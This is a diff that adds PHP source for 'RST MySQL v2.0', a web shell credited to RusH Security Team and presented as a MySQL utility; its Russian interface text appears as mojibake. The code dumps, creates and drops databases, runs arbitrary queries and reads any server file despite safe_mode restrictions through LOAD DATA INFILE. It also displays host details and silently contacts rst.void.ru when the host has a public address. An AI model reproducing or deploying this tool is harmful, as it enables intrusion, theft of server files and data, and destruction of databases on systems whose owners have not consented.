+        Îáõîä îãðàíè÷åíèé ïðè <b>safe_mode</b> è <b>safe_basedir</b>
+        </td></tr></table></td></tr>
+        <form method=\"get\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <tr><td align=center><br>Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"ïîêàçàòü ôàéë\">&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table><br>";
+
+$start_form="<br>
+<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td width=25>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td>
+                <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=200><br>
+        <center><b>Óòèëèòà äëÿ ðàáîòû ñ MySQL</b></center><hr width=98%>
+        <li>Ïðîñìîòð áàç è òàáëèö.
+        <li>Ïðîèçâîëüíûå çàïðîñû ê ÁÄ.
+        <li>Ðåäàêòèðîâàíèå áàç è òàáëèö.
+        <li>Äàìïû ÁÄ èëè òàáëèö.<hr width=98%>
+        Type - FREE<br>
+        Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
+        <center><br><br><font face=Webdings size=+18 color=#B6B5B5>&#0168;</font><center>
+   </td>
+   <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
+        <br>Äëÿ ñîåäèíåíèÿ ñ ñåðâåðîì MySQL ââåäèòå <b>ÈÌß</b>, <b>ÏÀÐÎËÜ</b> (ïîëüçîâàòåëÿ MySQL) è èìÿ <b>ÕÎÑÒÀ</b>.</font></center><br>
+        <li>Åñëè ëîãèí þçåðà mysql íå óêàçàí ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ èìÿ âëàäåëüöà ïðîöåññà.
+        <li>Åñëè ïàðîëü þçåðà mysql íå óêàçàí ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ ïóñòîé ïàðîëü.
+        <li>Åñëè èìÿ ñåâðâåðà mysql íå óêàçàíî ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ <b>localhost</b>
+        <li>Åñëè ïîðò äëÿ ñåâðâåðà mysql íå óêàçàí ÿâíî, ïîäñòàâëÿåòñÿ  ïîðò ïî óìîë÷àíèþ, îáû÷íî (<b>3306</b>)<br><br>
+        <center>Âåðñèÿ PHP (<b>".phpversion()."</b>)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ID PHP script (<b>".get_current_user( )."</b>)</center>
+        <br><table align=center>
+        <tr><td>èìÿ þçåðà MySQL</td><td align=right>ïàðîëü þçåðà MySQL&nbsp;</td></tr>
+        <form method=\"get\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"y\">
+        <tr>
+          <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
+          <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
+        </tr>
+        <tr><td>Ñåðâåð MySQL</td><td>ïîðò</td></tr>
+        <tr>                
+          <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
+          <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
+          <input type=\"submit\" value=\"ïîäêëþ÷èòüñÿ\"></td>
+        </tr></table><br>        
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
+";
+
+if ($os =='win') {
+$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
+}else{
+   $str_k=$_ENV["BOOT_FILE"];
+   $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
+   $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";
+
+}
+
+if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
+ $serv = array(127,192,172,10);
+ $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
+ if (!in_array($adrr[0], $serv)) {
+   //ïðè ïîÿâëåíèè íîâîé âåðñèè óòèëèòû ïîêàæåì ÷òî äîñòóïíà
+   //íîâàÿ âåðñèÿ è ïðåäëîæèì çàãðóçèòü åå ñ ñàéòà
+   @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
+   @readfile ("http://rst.void.ru/version_sql/version.php");  
+ }
+exit;
+}
+
+$form_ad_b="<br>
+<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
+ <tr>
+   <td>
+   <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
+    <td>
+      MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>)
+   </td>
+   <td align=center>
+      <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
+   </td>
+   <td align=right>
+      Âåðñèÿ PHP (<b>".phpversion()."</b>) $php_type
+   </td>
+ </tr>
+ <tr bgcolor=#DBDCDD>
+   <td>
+      IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
+   </td>
+   <td align=center>
+      ID PHP script (<b>".get_current_user( )."</b>)
+   </td>
+   <td align=right>
+      $os
+   </td>
+ </tr>
+ </table>
+</td></tr></table>
+<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ñòàòèñòèêà MySQL</b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>Èíôîðìàöèÿ PHP (ALL)</b></a>
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïðîöåññû MySQL </b></a>
+   </td>
+ </tr>
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïåðåìåííûå Apache </b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïåðåìåííûå MySQL </b></a> 
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïðîñìîòð ïðîèçâîëüíîãî ôàéëà ñåðâåðà äàæå ïðè âêëþ÷åíîì safe_mode è safe_mode_exec_dir\"><b>Ôàéë *?</b></a>
+   </td>
+ </tr>
+</table><br>
+
+<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+<tr bgcolor=#DBDCDD><td>
+<table align=center cellpadding=0 cellspacing=0>
+ <tr bgcolor=#DBDCDD>
+   <td> <table cellpadding=4><tr><td><b>Ñîçäàòü íîâóþ áàçó äàííûõ</b></td></tr><tr><td>
+        <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
+        <input type=\"submit\" value=\"ñîçäàòü\"></td>
+        </tr></table>
+   </td>
+ </tr>
+</table>
+</td>    
+</tr></table></form>
+
+<table width=80% align=center border=0 cellpadding=0>
+ <tr align=right>
+   <td width=85%></td>
+   <td width=15>
+    <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
+  </td>
+ </tr>
+</table>
+";
+        
+$cnt_b=mysql_num_rows(mysql_list_dbs());  // êîë-âî áàç mysql ñåðâåðà  
+print "
+<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td width=33%>
+                <font size=4><b>RST MySQL</b></font>
+            </td>
+            <td width=33% align=center>
+                <font color=blue><b>$server</b></font>&nbsp;[CONNECTION Ok] &nbsp;&nbsp;Âñåãî áàç: <b>$cnt_b</b>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=170>";
+
+if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
+ $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Îøèáêà ñîåäèíåíèÿ ñ MySQL ñåðâåðîì <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>Âåðîÿòíûå îøèáêè:</b><li>Íå ïðàâèëüíûé àäðåñ ñåðâåðà <b>$server</b><li>Íå ïðàâèëüíûé íîìåð ïîðòà <b>$port</b><li>Íå âåðíîå èìÿ (login) þçåðà mysql <b>$login</b><li>Íå âåðíûé ïàðîëü (password) þçåðà mysql <b>$passwd</b><li>Äîñòóï ê ñåðâåðó $server çàïðåùåí ñ àäðåñà <b>".getenv('REMOTE_ADDR')."</b><li>Óäàëåííûé ñåðâåð âðåìåííî íå äîñòóïåí</td></tr></table><br></td></tr></table><script>alert('Íå âîçìîæíî óñòàíîâèòü ñîåäèíåíèå ñ MySQL ñåðâåðîì $server \\n\\n Ïðîâåðüòå ïðàâèëüíîñòü âõîäÿùèõ äàííûõ:\\n\\nñåðâåð $server\\nïîðò $port\\nèìÿ $login\\nïàðîëü $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
+}
+
+
+/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
+/*Ïîêàçàòü âñå áàçû ñåðâåðà*/
+if ($connection&&!isset($db)) {
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âåðíóòüñÿ â íà÷àëî è îáíîâèòü ñïèñîê áàç\"><font color=green><b>".
+           "Ïîêàçàòü&nbsp;âñå&nbsp;áàçû</b></font></a></td></tr></table>";
+   
+   $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   while ( $row=mysql_fetch_row($result) ){
+       $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //êîë-âî òàáëèö áàçû   
+       print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
+       if ($cnt_title < 1) {
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âñåãî òàáëèö $cnt_title\"><b>$row[0]</b></a>";
+       }else{
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âñåãî òàáëèö $cnt_title\"><b>$row[0]</b></a>";
+       }
+       print "</td></tr></table>";
+    }
+}
+
+// ñïèñîê òàáëèö áàçû äàííûõ
+if (isset($db)){          
+  $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
+           "Ïîêàçàòü&nbsp;âñå&nbsp;áàçû</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
+        "---[ <a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"îáíîâèòü ñïèñîê òàáëèö\"><b>$db</b></a>".
+        " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  while ( $row=mysql_fetch_array($result) ){
+    //ïîëó÷àåì êîëè÷åñòâî ñòðîê(çàïèñåé) â òàáëèöå
+    $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
+    $count_row= mysql_fetch_array($count);
+    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
+          "<tr><td bgcolor=#DBDCDD>";
+    if ($count_row[0] < 1) { 
+       print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }else{
+        print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }
+    @mysql_free_result($count);
+  }
+} 
+
+/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/
+
+print "
+   </td>
+   <td valign=top bgcolor=#E6E7E9>";
+
+/*------------------------ R I G H T   B L O C K ! -----------------------*/
+if ($connection&&!isset($db)) { 
+$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
+if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>Âíèìàíèå!<b></td></tr><tr><td bgcolor=red>Àíîíèìíûì ïîëüçîâàòåëÿì ðàçðåøåíî ïîäêëþ÷åíèå ê ñåðâåðó MySQL</td></tr></table>"; }
+print $form_ad_b; 
+}
+/*-------------Ïðîöåññû MySql------------*/
+if (isset($proc) && $proc=="TRUE"){
+$result = mysql_query("SHOW PROCESSLIST", $connection); 
+ print "<center><font size=2>Ïðîöåññû MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
+ } 
+  print "</table><br>";
+ mysql_free_result($result);
+ unset($proc);
+}
+
+/*Ñîçäàåì íîâóþ áàçó*/
+if (isset($HTTP_GET_VARS['new_db'])){
+    $new_db=trim($HTTP_GET_VARS['new_db']);
+    if (mysql_create_db ($new_db)) {
+        print ("<center><font size=2>Áàçà <b>$new_db</b> óñïåøíî ñîçäàíà</font></center><br>");
+        print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    } else {
+        print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    }
+    unset($new_db);
+}
+
+/*Óäàëåíèå áàçû*/
+if (isset($HTTP_GET_VARS['drop'])){
+     $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
+     while ( $row_d=mysql_fetch_row($result_d) ){
+        if ($drop==$row_d[0]) $dr="TRUE";
+     }
+ if ($dr="TRUE") { 
+ mysql_drop_db($drop,$connection);
+ print ("<center><font size=2>Áàçà <b>$drop</b> óñïåøíî óäàëåíà</font></center><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+ }
+unset($drop);
+}
+
+/*-------------×èòàåì ïðîèçâîëüíûé ôàéë ñåðâåðà-----------*/
+if (isset($f)){
+print $form_file;
+}
+if(isset($p_file)){ 
+  mysql_create_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_select_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+  mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );') or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_query("LOAD DATA INFILE \"".addslashes($p_file)."\" INTO TABLE tmp_file");
+ $query = "SELECT * FROM tmp_file";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+  /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+   $name=mysql_field_name($result,$i);
+  } 
+  print "<table align=center border=0 cellpadding=5 cellspacing=1 width=90% bgcolor=#FFFFFF><tr><td align=center bgcolor=#DBDCDD>$name</td></tr>
+        <tr><td background=".$self."?img=st_form_bg bgcolor=#ECEDEE>
+        <form method=\"get\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"p_file\" value=\"$p_file\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"ïîêàçàòü ôàéë\"></form>
+  ";
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+      foreach ($line as $key =>$col_value) {          
+          print htmlspecialchars($col_value)."<br>";
+      }
+  }
+  mysql_free_result($result);
+  print "</td></tr></table><br>";
+  mysql_drop_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+} 
+
+/*--------------ïåðåìåííûå ñåðâåðà Apache------------*/
+if (isset($apc) && $apc=="TRUE"){
+ print "<center><font size=2>Ïåðåìåííûå ñåðâåðà Apache [ <b>$server</b> ]</font><center>
+ <table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF>
+  <tr align=center bgcolor=#B6B5B5>
+   <td>Îïèñàíèå</td><td>Ïåðåìåííàÿ</td>
+  </tr> 
+  <tr bgcolor=#DAD9D9><td>Èìÿ Internet-õîñòà</td><td>".$HTTP_SERVER_VARS["SERVER_NAME"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>IP-àäðåñ õîñòà</td><td>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ïîðò Web-ñåðâåðà.</td><td>".$HTTP_SERVER_VARS["SERVER_PORT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ñïåöèôèêàöèÿ CGI èíòåôåéñà.</td><td>".$HTTP_SERVER_VARS["GATEWAY_INTERFACE"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ïðîòîêîë ïðè çàïðîñå äàííîé ñòðàíèöû (ìåòîä).</td><td>".$HTTP_SERVER_VARS["REQUEST_METHOD"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Root äèðåêòîðèÿ äëÿ äàííîãî ïîëüçîâàòåëÿ.</td><td>".$HTTP_SERVER_VARS["DOCUMENT_ROOT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Çàãîëîâîê òåêóùåãî çàïðîñà.</td><td>".$HTTP_SERVER_VARS["HTTP_CONNECTION"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Äèðåêòèâà httpd.conf (SERVER_ADMIN).</td><td>".$HTTP_SERVER_VARS["SERVER_ADMIN"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ñèãíàòóðà ñåðâåðà.</td><td>".$HTTP_SERVER_VARS["SERVER_SIGNATURE"]."</td></tr>
+ </table><br>";
+ unset($apc);
+}
+
+/*---------------Ñòàòèñòèêà MySQL ñåðâåðà--------------*/
+if (isset($stat) && $stat=="TRUE"){
+$result = mysql_query("SHOW STATUS", $connection); 
+ print "<center><font size=2>Ïåðåìåííûå ñîñòîÿíèÿ MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=400 bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>Ïåðåìåííûå ñîñòîÿíèÿ ñåðâåðà</td><td>çíà÷åíèÿ ïåðåìåííûõ</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+}
+
+/*---------------Ñèñòåìíûå ïåðåìåííûå MySQL ñåðâåðà--------------*/
+if (isset($var) && $var=="TRUE"){
+$result = mysql_query("SHOW VARIABLES ", $connection); 
+ print "<center><font size=2>Ñèñòåìíûå ïåðåìåííûå MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>Ïåðåìåííûå ñåðâåðà</td><td>çíà÷åíèÿ ïåðåìåííûõ</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+unset($var);
+}
+
+/*-------------âûâîä äàííûõ òàáëèö------------*/
+if (isset($db) && !isset($tbl)) {
+$cnt=mysql_num_rows(mysql_list_tables($db)); //êîë-âî òàáëèö áàçû
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr>
+           <td>
+                <table border=0 align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&cr_tbl=new\" title=\"Ñîçäàòü íîâóþ òàáëèöó â áàçå $db\"><b>Ñîçäàòü òàáëèöó</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=bd\" title=\"Ïðîèçâîëüíûé çàïðîñ ê áàçå\"><b>SQL-çàïðîñ</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&str=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïîêàçàòü ñòðóêòóðó ÁÄ\"><b>ñòðóêòóðà</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&dump=bd\" title=\"Ýêñïîðò äàííûõ áàçû $db\"><b>Äàìï áàçû</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&drop=$db&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Óäàëèòü ÁÄ $db\" onClick=\"return confirm('Óäàëèòü áàçó $db ?')\";><b>óäàëèòü áàçó</b></a>
+                     </td>
+                   </tr> 
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+               print "&nbsp;&nbsp;ÁÄ:(<b>$db</b>)  &nbsp;&nbsp;Âñåãî òàáëèö:(<b>$cnt</b>)";
+               if (isset($t)) { print "<br>&nbsp;&nbsp;".base64_decode($t);}
+               if (isset($t2)) { print base64_decode($t2);}
+/*-------------Ñòðóêòóðà áàçû ------------------*/
+if (isset($str) && $str=='TRUE'){
+  mysql_select_db($db);
+  if ($cnt < 1) { 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>Íåâîçìîæíî ïîêàçàòü ñòðóêòóðó áàçû<br>Â áàçå <font color=blue>".
+            "$db</font> íåò òàáëèö!</h5></td></tr></table><br><br>";     
+  }else{
+    $result = mysql_query("SHOW TABLE STATUS", $connection); 
+    print "<br><center><font size=2>Ñòðóêòóðà áàçû [ <b>$db</b> ]</font></center>".
+          "<table align=center border=0 cellpadding=0 cellspacing=1 width=650 bgcolor=#FFFFFF>".
+          "<tr align=center bgcolor=#B6B5B5><td>èìÿ òàáëèöû</td><td>òèï</td><td>ðÿäîâ</td><td>ñîçäàíà</td>".
+          "<td>ìîäèôèöèðîâàíà</td><td>ðàçìåð(kb)</td><td>äåéñòâèå</td></tr>";
+    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+      $size=$row[5]/1000;
+      print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td align=center>$row[3]</td>".
+            "<td>$row[10]</td><td>$row[11]</td><td align=center>$size</td><td bgcolor=red align=center>".
+            "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&".
+            "port=$port&drop_table=$row[0]\" onClick=\"return confirm('Óäàëèòü òàáëèöó $row[0]?')\";>óíè÷òîæèòü</a></td>
+            </tr>";  
+    } 
+    print "</table><br>";
+    mysql_free_result($result);
+  }
+} 
+
+print "    </td>
+         </tr>
+       </table>";
+}
+
+/*------------äàìï áàçû----------------*/
+$form_dump_bd=
+"<form method=\"get\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<input type=\"hidden\" name=\"dump\" value=\"bd\">".
+"<input type=\"hidden\" name=\"strukt\" value=\"d_strukt_bd\">".
+"<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump áàçû</b> [ <font color=green><b>$db</b></font> ]</td></tr>".
+"<tr><td align=center><font color=gray><b>Ñòðóêòóðà è äàííûå</b></font></td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>Äåéñòâèå</b> (ïîêàçàòü/îòïðàâèòü)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> Ïîêàçàòü â áðîóçåðå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> Îòïðàâèòü ôàéë äàìïà ïî HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($HTTP_GET_VARS['dump']=='bd') {
+   if ($cnt >= 1) {
+      print $form_dump_bd;
+   }else{ 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>Íåâîçìîæíî ñäåëàòü äàìï áàçû<br>Â áàçå <font color=blue>".
+            "$db</font> íåò òàáëèö!</h5></td></tr></table><br><br>";
+   }
+}
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['send']=='send_br'){
